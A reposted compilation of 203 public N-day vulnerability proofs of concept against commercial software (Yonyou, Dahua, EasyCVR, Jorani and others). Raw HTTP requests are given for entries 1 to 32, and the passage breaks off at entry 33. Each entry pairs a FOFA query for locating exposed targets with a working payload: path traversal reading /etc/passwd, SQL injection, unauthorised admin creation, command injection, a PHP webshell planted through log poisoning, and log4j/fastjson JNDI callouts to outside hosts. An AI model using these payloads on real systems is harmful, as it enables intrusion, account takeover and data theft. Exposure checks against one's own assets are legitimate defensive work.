Public Internet Vulnerability Compilation 202309-202406 (repost)

Posted 2024-6-5 14:31:29
Public Internet Vulnerability Compilation 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article comes from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities makes up a large share of the attacks seen in offensive/defensive exercises, and we hope this article gives defenders some help. Defenders can use its contents to check their own assets for exposure.

Vulnerability sources: the article covers 203 PoCs for high-impact vulnerabilities disclosed publicly, in China and abroad, between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Security patches: all of these vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few PoCs that were too long have been replaced by the word PAYLOAD; search for the full PoC yourself if you need it.

Legal rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the back end to have the relevant content removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list"; this article is already the most complete version. When using it, press F12 and search for keywords.

Bookmark this article if you need it, or follow the public account (网络安全新视界).
Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 proactive safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC intelligent IoT integrated management platform arbitrary file read
21. 大华ICC intelligent IoT integrated management platform random remote code execution
22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户ezOFFICE collaboration management platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 mobile campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE O&M security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin account creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康NS-ASG application security gateway index.php SQL injection
135. 网康NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass and template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6 vehicle GPS monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS video management system dmku SQL injection
201. 方正 omni-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

PoC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Replace password with the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 proactive safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging into the admin backend with the default account admin, perform the following operation.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword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x
Host: x.x.x.x

The payload is the following statement, double URL-encoded:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: the injected function runs a base64-encoded command.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls a database function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. 大华ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}


22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-Type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Then access:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
